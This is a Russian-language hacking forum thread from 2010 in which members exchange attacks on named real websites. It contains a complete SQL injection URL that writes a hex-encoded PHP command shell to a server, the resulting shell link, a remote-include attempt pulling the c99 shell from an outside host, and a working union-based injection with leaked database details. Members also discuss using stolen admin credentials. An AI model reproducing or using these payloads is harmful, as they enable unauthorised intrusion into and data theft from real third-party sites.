Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    чё то я не могу понять а вывод, то есть команды?
    вот чё то я пеопробовал и файло у меня не перечиталось
     
  2. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    LokbatanLi!как то ты по извращенному льешь шелл


    Вот! http://www.georgica.net/temp/1.php?id=ls

    вывод в файл работает!
    http://www.georgica.net/analitic/?page=ru&id=-303'+UNION+SELECT+0x3C3F206563686F20223C7072653E223B6563686F2073797374656D28245F4745545B226964225D293B6563686F20223C2F7072653E22203F3E,2,3,4,5,6,7,8+FROM+mysql.user+INTO+DUMPFILE+'/home/www/htdocs/temp/1.php'+--+

    все норм
     
    #11882 Rubaka, 18 Mar 2010
    Last edited: 18 Mar 2010
    1 person likes this.
  3. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Rubaka
    a qde shell ??

    http://www.georgica.net/temp/1.php?id=http://azattacker.org/forum/c99.txt?
     
  4. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Вот шелл http://www.georgica.net/temp/1.php?id=ls <------в id комманды передаешь!!
    а не инклюдишь!
    тама код system($_GET["id"]); прописан!

    и ты могешь мля не писать транслитом!!!!!!!!!!!
     
    #11884 Rubaka, 18 Mar 2010
    Last edited: 18 Mar 2010
  5. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    net ne kak ne moqu ponyat izvini..
     
    1 person likes this.
  6. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    Подскажите плиз. http://met-con.com/images/?w=700&src=/images/properties/dump%20oct%2019%202009%20110.jpg

    там есть читалка?
     
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    скуля есть
    PHP:
    http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(),0x40,user()),3,4,5--+
    5.0.89-community@metcon_web@metcon_webuser@localhost
     
    1 person likes this.
  8. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
    На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
    У кого есть ссылка на какую-то статью на эту тему напишите.
     
  9. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    да я знаю.но мне она нах не нужна, т.к. там .htpasswd auth
     
  10. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Шелл пока немного не то. Хотя смотря каким макаром ты достал логин и пасс.
    Попробуй поискать админку. www.site.ru/admin
    или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
     
  11. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Это знаю, пробивал - нет.
    А почему шелл - не то? Дайте у кого есть инфу на эту тему.
     
  12. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
     
  13. FAPSI

    FAPSI Banned

    Joined:
    18 Sep 2008
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

    Помогите довести до ума [​IMG]
     
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Админку достал из БД. В таблице юзеров был и админ. Так как это реализовать?
     
  15. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Бд слита или есть доступ к phpmyadmin?
     
  16. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23

    Обычный фрейм.
     
  17. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Я просто прочитал бд и увидел там ники и пароли юзеров. Доступа к пхпадмин - нет.
     
  18. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Кинь адрес сайта в ПМ попробую посмотреть...
     
  19. FAPSI

    FAPSI Banned

    Joined:
    18 Sep 2008
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    Сделать ничего нельзя?
     
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    нет..
     
    1 person likes this.
Thread Status:
Not open for further replies.